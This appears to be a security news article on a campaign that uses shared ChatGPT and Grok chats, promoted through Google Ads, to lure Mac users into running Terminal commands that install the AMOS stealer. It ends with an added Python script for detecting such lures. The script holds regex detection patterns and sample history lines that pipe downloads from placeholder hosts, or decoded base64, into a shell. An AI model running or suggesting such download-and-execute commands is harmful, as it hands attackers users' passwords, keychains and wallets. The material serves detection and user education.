Threat Actors Weaponize ChatGPT, Grok and Leverage Google Ads to Distribute macOS AMOS Stealer
Cybercriminals have developed a sophisticated attack campaign that exploits user trust in artificial intelligence platforms to distribute the Atomic macOS Stealer (AMOS), marking a dangerous evolution in social engineering tactics.
This new threat combines legitimate AI chatbot services from ChatGPT and Grok with paid Google advertising to lure unsuspecting Mac users into executing malicious terminal commands that compromise their systems.
The campaign specifically targets individuals searching for common troubleshooting solutions, such as clearing disk space on macOS, redirecting them to seemingly authentic AI-generated instructions hosted on trusted domains.
The attack method leverages a technique known as “ClickFix,” where users are tricked into manually running shell commands that download and install malware directly onto their devices.
What makes this campaign particularly effective is that it sidesteps traditional security measures by appearing completely legitimate: the malicious instructions are hosted on the official ChatGPT and Grok websites rather than on suspicious third-party domains.
Once executed, the AMOS stealer immediately begins harvesting sensitive information including browser passwords, cryptocurrency wallet seed phrases, Keychain credentials, and personal files, transmitting everything to attacker-controlled servers.
Flare analysts identified that attackers create shareable AI chat links containing step-by-step “installation guides” disguised as legitimate macOS troubleshooting instructions.
These conversations are then promoted to the top of Google search results through paid advertising campaigns, ensuring maximum visibility when users search for common technical queries.
The social engineering component proves remarkably effective because users inherently trust results appearing on reputable platforms such as the OpenAI and X.AI domains, combined with the additional credibility boost of appearing as sponsored Google search results.
Attack Mechanism and Infection Chain
The infection process begins when a Mac user conducts a routine Google search for troubleshooting assistance, such as “clear disk space on macOS” or similar technical queries.
Sponsored advertisements or highly ranked organic results direct victims to shared ChatGPT or Grok conversations that appear to offer helpful system maintenance guidance.
These AI-generated conversations contain carefully crafted instructions that prompt users to open their Terminal application and paste what appears to be a harmless command.
The malicious command downloads a script from an external domain controlled by the attackers, which then repeatedly requests the user’s system password under the guise of legitimate system operations.
Once the correct credentials are provided, the script installs the AMOS infostealer along with a persistent backdoor that survives system reboots and provides long-term remote access to the compromised machine.
The malware immediately targets cryptocurrency wallets including Electrum, Exodus, Coinbase, MetaMask, and Ledger Live, extracting seed phrases and private keys that enable immediate theft of digital assets.
Additionally, AMOS harvests browser data from Chrome, Safari, and Firefox, including saved passwords, cookies, autofill information, and active login sessions.
Organizations and individual Mac users should monitor for unsigned applications requesting system passwords, unusual Terminal activity, and unexpected network connections to unfamiliar domains.
Security teams must educate users that instructions appearing on trusted AI platforms can be attacker-authored and surfaced through social engineering, and that any guidance requesting Terminal command execution should be independently verified through official support channels before it is followed.
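One concrete way to act on the monitoring advice above is to triage shell history or command-line telemetry for the shape of a ClickFix lure: a fetch from an external domain piped or substituted straight into an interpreter, an embedded base64 payload decoded into a shell, or sudo wrapped around a download. The script below is an added example written for this article, not code from Flare or from the Cyber Security News post; the history lines, the `example.invalid` hosts and the `KNOWN_GOOD_HOSTS` allowlist are constructed placeholders, and it generalises beyond the single "clear disk space" lure the article describes by matching the command patterns rather than any specific wording.

```python
"""Triage shell history for ClickFix-style download-and-execute one-liners.

Added example (not from the original article). Reads zsh extended-history
lines or plain commands, flags fetch-to-interpreter patterns, and reports
any download host not on a known-good allowlist.
"""
import re
from dataclasses import dataclass, field

# Constructed allowlist placeholder; a real deployment would populate this
# from the organisation's own script-hosting inventory.
KNOWN_GOOD_HOSTS = {"raw.githubusercontent.com", "updates.example-corp.invalid"}

# (name, regex) pairs describing the shape of "paste this into Terminal" lures.
INDICATORS = (
    ("fetch_piped_to_shell",
     re.compile(r"\b(curl|wget)\b[^|;&]*\|\s*(sudo\s+)?(ba|z)?sh\b")),
    ("fetch_in_substitution",
     re.compile(r"(\$\(|`)\s*(curl|wget)\b")),
    ("base64_decode_to_shell",
     re.compile(r"base64\s+(-d|-D|--decode)\b.*\|\s*(sudo\s+)?(ba|z)?sh\b")),
    ("sudo_with_fetch",
     re.compile(r"\bsudo\b.*\b(curl|wget)\b|\b(curl|wget)\b.*\bsudo\b")),
)

URL_HOST = re.compile(r"https?://([A-Za-z0-9.-]+)", re.IGNORECASE)
ZSH_EXTENDED = re.compile(r"^: (\d+):\d+;(.*)$")


@dataclass
class Finding:
    command: str
    indicators: list = field(default_factory=list)
    unfamiliar_hosts: list = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        return bool(self.indicators)


def parse_history_line(line: str) -> str:
    """Strip the zsh extended-history prefix ': <epoch>:<duration>;' if present."""
    m = ZSH_EXTENDED.match(line.rstrip("\n"))
    return m.group(2) if m else line.rstrip("\n")


def analyse_command(command: str, known_good=KNOWN_GOOD_HOSTS) -> Finding:
    """Match every indicator against one command and extract unfamiliar hosts."""
    finding = Finding(command=command)
    for name, pattern in INDICATORS:
        if pattern.search(command):
            finding.indicators.append(name)
    hosts = [h.lower() for h in URL_HOST.findall(command)]
    finding.unfamiliar_hosts = sorted({h for h in hosts if h not in known_good})
    return finding


def triage_history(lines):
    """Return only the commands that hit at least one indicator.

    A plain download from an unfamiliar host is deliberately not flagged on
    its own; the lure pattern is download *and* immediate execution.
    """
    return [f for f in (analyse_command(parse_history_line(l)) for l in lines)
            if f.suspicious]


# Constructed sample history in zsh extended format (not real telemetry).
SAMPLE_HISTORY = [
    ": 1700000001:0;ls -la ~/Library/Caches",
    ": 1700000002:0;brew cleanup",
    ": 1700000003:0;curl -fsSL https://example.invalid/cleanup.sh | bash",
    ': 1700000004:0;echo "c29tZSBwYXlsb2Fk" | base64 -D | sh',
    ': 1700000005:0;sudo bash -c "$(curl -fsSL https://example.invalid/fix.sh)"',
    ": 1700000006:0;curl -O https://raw.githubusercontent.com/org/repo/main/script.sh",
    ": 1700000007:0;sudo du -sh /private/var/log",
]

if __name__ == "__main__":
    for f in triage_history(SAMPLE_HISTORY):
        print(f"[{', '.join(f.indicators)}] hosts={f.unfamiliar_hosts}: {f.command}")
```

On a real machine the same functions can be pointed at `~/.zsh_history` or at process-creation events from an EDR; the indicator names give an analyst a reason per hit, and the unfamiliar-host list is what to pivot on when checking for the unexpected outbound connections the article recommends watching.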
The post Threat Actors Weaponize ChatGPT, Grok and Leverages Google Ads to Distribute macOS AMOS Stealer appeared first on Cyber Security News .